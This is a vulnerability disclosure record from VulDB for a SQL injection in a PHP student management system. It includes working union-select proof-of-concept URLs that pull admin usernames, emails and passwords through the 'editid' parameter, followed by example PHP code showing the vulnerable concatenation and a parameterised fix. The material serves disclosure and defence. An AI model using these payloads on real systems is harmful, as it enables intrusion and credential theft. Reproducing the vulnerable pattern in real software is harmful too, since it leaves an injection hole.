| Field | Value |
|---|---|
| Title | eduAuthorities SQL Injection |
| Description | Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html<br>Version environment:<br>php=7.3.4<br>Mysql=5.7.26<br>Apache=2.4.39<br>Preparation:<br>Create a "student" database in MySQL.<br>Set the database username and password in "dbconnection.php", then open http://localhost/eduauth/index.php and log in with the account and password.<br>Vulnerability:<br>http://localhost/eduauth/edit-class-detail.php?editid=1<br>On line 54 of "edit-class-detail.php", the parameter "editid" is not filtered and can be exploited directly.<br>http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin#<br>You can see that data is returned.<br>Poc:<br>http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin#<br>Vulnerability principle:<br>Check the "edit-class-detail.php" file.<br>On line 55, the user input parameter "editid" is concatenated directly into the SQL statement, and on line 57 the query is executed. |
| User | 0chen (UID 41914) |
| Submitted | 2023-02-28 08:35 (3 years ago) |
| Moderated | 2023-02-28 21:03 (12 hours later) |
| Status | Accepted |
| VulDB entry | 222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid SQL Injection] |
| Points | 17 |
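The report describes the root cause (the `editid` GET parameter concatenated straight into a SQL string) but does not show the code. The following is an added example, not the project's source: a hypothetical reconstruction of that pattern next to a hardened version that validates the value as an integer and binds it through a mysqli prepared statement. The connection variable `$con`, the table `tblclass` and its columns `ID` and `ClassName` are assumptions; the report only names `tbladmin` and the `editid` parameter.

```php
<?php
// Added example (not the project's code). Reconstructs the vulnerable pattern
// described in the VulDB report beside a parameterised replacement.
// Assumption: dbconnection.php (named in the report) defines $con, a mysqli
// connection. The table "tblclass" and its columns are also assumptions.
require 'dbconnection.php';

// --- Vulnerable pattern, as described in the report ---
// The raw request value becomes part of the SQL text, so a value that contains
// SQL syntax changes the meaning of the statement instead of being treated as
// data. Kept here only to show what the fix below replaces.
function loadClassVulnerable(mysqli $con, string $editid)
{
    $sql = "SELECT * FROM tblclass WHERE ID='" . $editid . "'";
    return mysqli_query($con, $sql);
}

// --- Hardened version ---
// 1. Validate the type: an edit id must be a positive integer, so anything
//    else (including the report's "-3 union select ...") is rejected before
//    a query is built.
// 2. Bind the value as a parameter. The SQL text is fixed at prepare time and
//    the bound value can never be parsed as SQL.
function loadClassSafe(mysqli $con, $editid): ?array
{
    $id = filter_var($editid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // Select only the columns the page needs instead of "*".
    $stmt = $con->prepare("SELECT ID, ClassName FROM tblclass WHERE ID = ?");
    if ($stmt === false) {
        // Do not echo $con->error to the client; log it server-side instead.
        error_log('prepare failed: ' . $con->error);
        http_response_code(500);
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    // get_result() requires the mysqlnd driver, which ships with PHP 7.3.
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

$row = loadClassSafe($con, $_GET['editid'] ?? '');
if ($row === null) {
    exit('Class not found');
}
// ... render $row ...
```

With the hardened version, the request strings shown in the report fail the integer check and return HTTP 400 without touching the database. A `400` for `edit-class-detail.php` with a non-numeric `editid` in the access log is also a simple thing to alert on, since a legitimate link to that page always carries a plain integer.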